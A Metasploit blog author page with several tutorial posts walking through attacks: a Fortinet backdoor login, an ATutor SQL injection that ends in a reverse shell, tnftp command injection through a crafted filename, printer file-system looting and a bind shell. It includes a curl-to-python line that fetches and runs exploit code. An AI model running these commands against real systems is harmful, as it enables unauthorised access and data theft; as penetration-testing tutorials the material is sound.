Skip navigation
All Places > Metasploit > Blog > Authors William Vu

Metasploit

5 Posts authored by: William Vu Employee
William Vu

Weekly Metasploit Wrapup

Posted by William Vu Employee Mar 14, 2016

Scanning for the Fortinet backdoor with Metasploit

 

Written by wvu

 

Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out!

 

wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL
msf > use auxiliary/scanner/ssh/fortinet_backdoor 
msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24
rhosts => 417.216.55.0/24
msf auxiliary(fortinet_backdoor) > set threads 100
threads => 100
msf auxiliary(fortinet_backdoor) > run

[*] Scanned 35 of 256 hosts (13% complete)
[*] Scanned 84 of 256 hosts (32% complete)
[*] Scanned 90 of 256 hosts (35% complete)
[+] 417.216.55.69:22 - Logged in as Fortimanager_Access
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 174 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 233 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(fortinet_backdoor) > 
[1]+ Stopped ./msfconsole -qL
wvu@kharak:~/metasploit-framework:master$ python <(curl -s https://www.exploit-db.com/download/39224) 417.216.55.69
FortiGate-VM64 # 
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
exit Exit the CLI.

FortiGate-VM64#


Easy as can be.

 

The module doesn't get sessions yet due to complications with net-ssh, but we're working on it!

 

Shall we play a game, ATutor?

 

Written by Bill Webb

 

header_small.png

 

Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies?  Now you can with the addition of the ATutor 2.2.1 SQL injection module.  This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrators interface.  While reaching the vulnerability requires one to login to ATutor as a student, remote registration is enabled by default.  Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ...

 

msf exploit(atutor_sqli) > check
[+] The target is vulnerable.
msf exploit(atutor_sqli) > exploit

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] 192.168.1.202:80 - Logged in as admin, sending a few test injections...
[*] 192.168.1.202:80 - Dumping username and password hash...
[+] 192.168.1.202:80 - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !
[*] 192.168.1.202:80 - Logged in as admin, uploading shell...
[+] 192.168.1.202:80 - Shell upload successful!
[*] Sending stage (33684 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.202:49271) at 2016-02-29 18:44:11 -0600
[+] 192.168.1.202:80 - Deleted ocfw.php
[+] 192.168.1.202:80 - Deleted ../../content/module/qee/ocfw.php

meterpreter >


... or pulling off their best Matthew Broderick impersonation.

 

grades.gif

 

It's almost like it's 1983 again.

 

(We can't guarantee that the ladies will in fact be impressed ...)

 

New modules

 

Exploit modules (3 new)

 

Auxiliary and post modules (6 new)

 

Get it

 

As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.

This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.

 

It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug? That remains unpatched today on a fairly popular operating system? Read on...

 

popen()'ing an RCE present

Shortly before Halloween, I was reading the oss-sec mailing list when I stumbled upon a pretty cool (almost tragic) bug in the ftp(1) command on {Free,Net,DragonFly}BSD and OS X.

 

The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:

This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource.

If tnftp is executed without the -o command-line option, it will resolvethe output filename from the last component of the requested resource.

If the output filename begins with a "|" character, tnftp will pass thefetched resource's output to the command directly following the "|" character through the use of the popen() function.

 

Okay, so how do we use this thing?

We can use Metasploit! Using auxiliary/server/tnftp_savefile is pretty easy:

 

msf > use auxiliary/server/tnftp_savefile   
msf auxiliary(tnftp_savefile) > set uripath /  
uripath => /  
msf auxiliary(tnftp_savefile) > set urihost [redacted]  
urihost => [redacted]  
msf auxiliary(tnftp_savefile) > set uriport 80  
uriport => 80  
msf auxiliary(tnftp_savefile) > run  
[*] Auxiliary module execution completed  
msf auxiliary(tnftp_savefile) >   
[*] Using URL: http://0.0.0.0:8080/  
[*]  Local IP: http://10.6.0.59:8080/  
[*] Server started.  

 

Don't worry about the URIHOST or URIPORT advanced options unless you're working through a tunnel. Just set URIPATH to / to allow any URL to redirect to the exploit.

 

Triggering the vulnerability

Here we are triggering the vuln on a fully patched OS X Yosemite system:

 

wvu@hiigara:~$ ftp http://[redacted]/index.html  
Requesting http://[redacted]/index.html  
Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61  
Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61  
     0        0.00 KiB/s Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64  
     0        0.00 KiB/s   
wvu@hiigara:~$ 

 

Thanks to the redirect, we can hide the true purpose of our URL until it's too late.

 

Back in msfconsole, we can see the results of our attack:

 

[*] 10.6.0.59        tnftp_savefile - tnftp/20070806 connected
[*] 10.6.0.59        tnftp_savefile - Redirecting to exploit...
[+] 10.6.0.59        tnftp_savefile - Executing `uname -a'!



 

That's really all there is to it! Happy hacking!

Hello, Metasploiters! Just wanted to update y'all on a new feature in msfconsole that *hopefully* should make vgrepping through module options a little easier.

 

Show empty required options

 

The new command is show missing, and all it does is show empty required options. Instead of looking through a long list of options and picking out the required ones that haven't been set, just run show missing, and a list of unset required options will be shown.

 

Here's an example with smb_login:


 

 

Pretty snazzy, huh?

 

It also works on payload options, as we can see with good ol' ms08_067_netapi:


 

 

That's all there is to it!

As of this last release, PJL (HP's Printer Job Language) is now a grown-up Rex::Proto protocol! Since extending a protocol in Metasploit is beyond the scope of this post, we'll just be covering how to use the PoC modules included with the new protocol. Feel free to dig around in lib/rex/proto/pjl*, though!

 

Okay, let's get started!

 

printer_version_info

 

First off, we have printer_version_info. This module lets us scan a range of hosts for printer version information. We'll set RHOSTS globally so we don't need to worry about setting it later. :)

 

msf > use auxiliary/scanner/printer/printer_version_info 
msf auxiliary(printer_version_info) > setg RHOSTS 417.216.55.69
RHOSTS => 417.216.55.69
msf auxiliary(printer_version_info) > run

[+] 417.216.55.69:9100 - HP LaserJet M5035 MFP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

As you can see, our target is an HP LaserJet M5035 MFP. This gives us a good idea of what to expect while running later modules.

 

printer_env_vars

 

printer_env_vars will get us a list of environment variables on the printer. This information isn't necessarily useful for what we're about to do, but it does give us information about the printer's configuration.

 

msf auxiliary(printer_version_info) > use auxiliary/scanner/printer/printer_env_vars 
msf auxiliary(printer_env_vars) > run

[+] 417.216.55.69:9100
LANG=ENGLISH [22 ENUMERATED]
     ENGLISH
     FRENCH
     GERMAN
     ITALIAN
     SPANISH
     SWEDISH
     DANISH
     NORWEGIAN
     DUTCH
     FINNISH
     PORTUGUESE
     TURKISH
     POLISH
     RUSSIAN
     CZECH
     HUNGARIAN
     CATALAN
     ΑΓΓΛΙΚΑ
     ENGLISH
     ENGLISH
     ENGLISH
     ENGLISH
[snip]

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

Since the listing is so long, we've snipped off everything past the language setting.

 

printer_list_volumes

 

Now we're going to start mucking with the printer's filesystem. We can list the initialized volumes using printer_list_volumes.

 

msf auxiliary(printer_env_vars) > use auxiliary/scanner/printer/printer_list_volumes 
msf auxiliary(printer_list_volumes) > run

[+] 417.216.55.69:9100
        VOLUME  TOTAL SIZE      FREE SPACE      LOCATION    LABEL   STATUS
        0:      119754063872    119613587456    DISK 3      ?       READ-WRITE

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

That's a lot of free space! Volume 0: has over a hundred gigs of readable/writable free space. Someone should implement FSDOWNLOAD to take advantage of that. ;)

 

printer_list_dir

 

Let's snoop around in 0:\ with printer_list_dir. Take a close look at the directories that pop up. Printers are unassuming, but this causes many people to consider them harmless. In reality, much of what people send through a printer may be stored or at least logged to its filesystem. Yeah, it has a disk. Scary, huh?

 

msf auxiliary(printer_list_volumes) > use auxiliary/scanner/printer/printer_list_dir 
msf auxiliary(printer_list_dir) > set PATHNAME '0:\'
PATHNAME => 0:\
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
PermStore TYPE=DIR
saveDevice TYPE=DIR
webServer TYPE=DIR
FaxIn TYPE=DIR
Fax TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > set PATHNAME '0:\saveDevice'
PATHNAME => 0:\saveDevice
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
CertMgmt TYPE=DIR
DigitalSend TYPE=DIR
ScanJobs TYPE=DIR
SavedJobs TYPE=DIR
SecurityAttrs TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > set PATHNAME '0:\saveDevice\DigitalSend'
PATHNAME => 0:\saveDevice\DigitalSend
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
Jobs TYPE=DIR
ImagePipeline TYPE=DIR
Log TYPE=DIR
AddressBook TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > set PATHNAME '0:\saveDevice\DigitalSend\AddressBook'
PATHNAME => 0:\saveDevice\DigitalSend\AddressBook
msf auxiliary(printer_list_dir) > run

[+] 417.216.55.69:9100
. TYPE=DIR
.. TYPE=DIR
EmailPDL TYPE=DIR
FolderDestPDL TYPE=DIR
NetFolderPDL TYPE=DIR
speeddial.state TYPE=FILE SIZE=6
speeddial.db TYPE=FILE SIZE=2560
speeddial.bak TYPE=FILE SIZE=2560
email.state TYPE=FILE SIZE=6
email.db TYPE=FILE SIZE=16384
email.bak TYPE=FILE SIZE=16384
fax.state TYPE=FILE SIZE=6
fax.db TYPE=FILE SIZE=2560
fax.bak TYPE=FILE SIZE=2560

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

email.db looks interesting!

 

printer_download_file

 

Okay, so we found an interesting file (0:\saveDevice\DigitalSend\AddressBook\email.db) with printer_list_dir. We can now use printer_download_file to download it. The file will be stored in loot.

 

msf auxiliary(printer_list_dir) > use auxiliary/scanner/printer/printer_download_file 
msf auxiliary(printer_download_file) > set PATHNAME '0:\saveDevice\DigitalSend\AddressBook\email.db'
PATHNAME => 0:\saveDevice\DigitalSend\AddressBook\email.db
msf auxiliary(printer_download_file) > run

[+] 417.216.55.69:9100 - 0:\saveDevice\DigitalSend\AddressBook\email.db
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_download_file) > loot 

Loot
====

host           service  type          name                                            content                   info          path
----           -------  ----          ----                                            -------                   ----          ----
417.216.55.69           printer.file  0:\saveDevice\DigitalSend\AddressBook\email.db  application/octet-stream  Printer file  /home/theplague/.msf4/loot/20140123145418_default_417.216.55.69_printer.file_564610.db

msf auxiliary(printer_download_file) > strings /home/theplague/.msf4/loot/20140123145418_default_417.216.55.69_printer.file_564610.db | tr A-Z a-z | sort -u
[*] exec: strings /home/theplague/.msf4/loot/20140123145418_default_417.216.55.69_printer.file_564610.db | tr A-Z a-z | sort -u

zerocool@nyse
acidburn@otv
joey@gibson

 

E-mail addresses! Just one of the many things you might find on a printer filesystem... Obviously, the real addresses have been replaced by fake ones, but the significance of this find is the same. In this case, those could have been organization e-mail addresses, which means you would now have usernames you could leverage for further attacks.

 

printer_ready_message

 

Okay, phew, we're done with the serious stuff, so let's have a little fun! There's an old trick to change the message on a printer's LCD screen. We're going to use printer_ready_message for that.

 

Here, we're changing the display to something you all should know. :P

 

msf auxiliary(printer_download_file) > use auxiliary/scanner/printer/printer_ready_message 
msf auxiliary(printer_ready_message) > set ACTION Change 
ACTION => Change
msf auxiliary(printer_ready_message) > set MESSAGE HACK THE PLANET
MESSAGE => HACK THE PLANET
msf auxiliary(printer_ready_message) > run

[+] 417.216.55.69:9100 - HACK THE PLANET
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


 

 

It's probably a good idea to reset the display once you're done trolling. Just set ACTION to Reset and hit run!

 

msf auxiliary(printer_ready_message) > set ACTION Reset 
ACTION => Reset
msf auxiliary(printer_ready_message) > run

[+] 417.216.55.69:9100 - Processing...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


 

 

Like a ghost. ;)

 

Conclusion

 

If you're new to Metasploit, never fear! You can download it here. If you already have Metasploit installed, these modules are only an msfupdate away!

 

Credits

 

This post is the ninth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements in the Metasploit Framework over the course of 2013.

 

A few months ago, contributor geyslan submitted a cool pull request for a random-port bind shell payload on x86 and x64 Linux systems.

 

In this post, we'll explore how to use this payload with our friends Nmap and Ndiff. Let's get hacking!

 

Why should I use this thing?

 

Well, if you can use a reverse shell or a traditional bind shell, do that! The primary benefit of shell_bind_tcp_random_port is its size. By avoiding the bind call, the payload is a fair bit smaller than your usual bind shell. This could be useful if you have a severe size restriction on your payload.

 

Metasploitable

 

We're using Metasploitable for our vulnerable host. Just boot up the VM with host-only networking enabled, and you should be good to go. In this case, Metasploitable is at 172.16.126.129.

 

Nmap

 

First, we need to get a list of open ephemeral ports using Nmap. An ephemeral port is just a port that the OS assigns automatically and temporarily. Our payload will bind to one of these ports. We use a little shell magic to parse the ephemeral port range in /proc/sys/net/ipv4/ip_local_port_range and feed it to Nmap. We also need to save the scan results to before.xml in order to use Ndiff later.

 

root@kharak:~# nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX before.xml --open --send-ip 172.16.126.129 Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 11:59 CST Initiating SYN Stealth Scan at 11:59 Scanning 172.16.126.129 [28233 ports] Discovered open port 33395/tcp on 172.16.126.129 Discovered open port 47431/tcp on 172.16.126.129 Discovered open port 49712/tcp on 172.16.126.129 Discovered open port 51488/tcp on 172.16.126.129 Completed SYN Stealth Scan at 11:59, 0.31s elapsed (28233 total ports) Nmap scan report for 172.16.126.129 Host is up (0.00014s latency). Not shown: 28229 closed ports PORT      STATE SERVICE 33395/tcp open  unknown 47431/tcp open  unknown 49712/tcp open  unknown 51488/tcp open  unknown MAC Address: 00:0C:29:3D:5A:9B (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds            Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB) 

 

As you can see, ports {33395,47431,49712,51488}/tcp are open in the ephemeral port range.

 

Metasploit

 

Next, we need to exploit the system. We're using exploit/multi/ssh/sshexec here, since we know that Metasploitable has SSH open with default creds msfadmin:msfadmin.

 

Make sure to use the payload linux/x86/shell_bind_tcp_random_port. That's why we're here, right? :)

 

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > setg RHOST 172.16.126.129
RHOST => 172.16.126.129
msf exploit(sshexec) > set USERNAME msfadmin
USERNAME => msfadmin
msf exploit(sshexec) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf exploit(sshexec) > set PAYLOAD linux/x86/shell_bind_tcp_random_port
PAYLOAD => linux/x86/shell_bind_tcp_random_port
msf exploit(sshexec) > exploit

[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress -  38.67% done (268/693 bytes)
[*] Command Stager progress - 100.00% done (693/693 bytes)

 

We won't get a session from this, since Metasploit doesn't know which port the payload is running on (by nature of the payload).

 

Nmap and Ndiff

 

Almost there! Now we need to scan the host again to get the new state of open ephemeral ports. We save the results to after.xml.

 

After that, we can use Ndiff on before.xml and after.xml, revealing to us the port our bind shell is on.

 

root@kharak:~# ^before^after nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX after.xml --open --send-ip 172.16.126.129 Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 12:00 CST Initiating SYN Stealth Scan at 12:00 Scanning 172.16.126.129 [28233 ports] Discovered open port 51488/tcp on 172.16.126.129 Discovered open port 49712/tcp on 172.16.126.129 Discovered open port 33395/tcp on 172.16.126.129 Discovered open port 47431/tcp on 172.16.126.129 Discovered open port 36503/tcp on 172.16.126.129 Completed SYN Stealth Scan at 12:01, 0.27s elapsed (28233 total ports) Nmap scan report for 172.16.126.129 Host is up (0.00012s latency). Not shown: 28228 closed ports PORT      STATE SERVICE 33395/tcp open  unknown 36503/tcp open  unknown 47431/tcp open  unknown 49712/tcp open  unknown 51488/tcp open  unknown MAC Address: 00:0C:29:3D:5A:9B (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds            Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB) root@kharak:~# ndiff {before,after}.xml -Nmap 6.00 scan initiated Thu Jan 02 11:59:37 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX before.xml --open --send-ip 172.16.126.129 +Nmap 6.00 scan initiated Thu Jan 02 12:00:59 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX after.xml --open --send-ip 172.16.126.129 172.16.126.129, 00:0C:29:3D:5A:9B: -Not shown: 28229 closed ports +Not shown: 28228 closed ports PORT      STATE SERVICE VERSION +36503/tcp open 

 

Our bind shell is on port 36503/tcp!

 

Metasploit

 

Finally, we can pop a shell with exploit/multi/handler. Just set PAYLOAD to linux/x86/shell_bind_tcp, LPORT to the port you found with Ndiff, and hit exploit! We already set RHOST globally when we used exploit/multi/ssh/sshexec. :)

 

msf exploit(sshexec) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(handler) > set LPORT 36503
LPORT => 36503
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (172.16.126.1:41368 -> 172.16.126.129:36503) at 2014-01-02 12:01:39 -0600

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

 

And there you have it! We got a shell. :D

 

Conclusion

 

If you're new to Metasploit and want to try your hand at some awesome hax, you can download it here. Hack the planet!

Filter Blog

By date: By tag: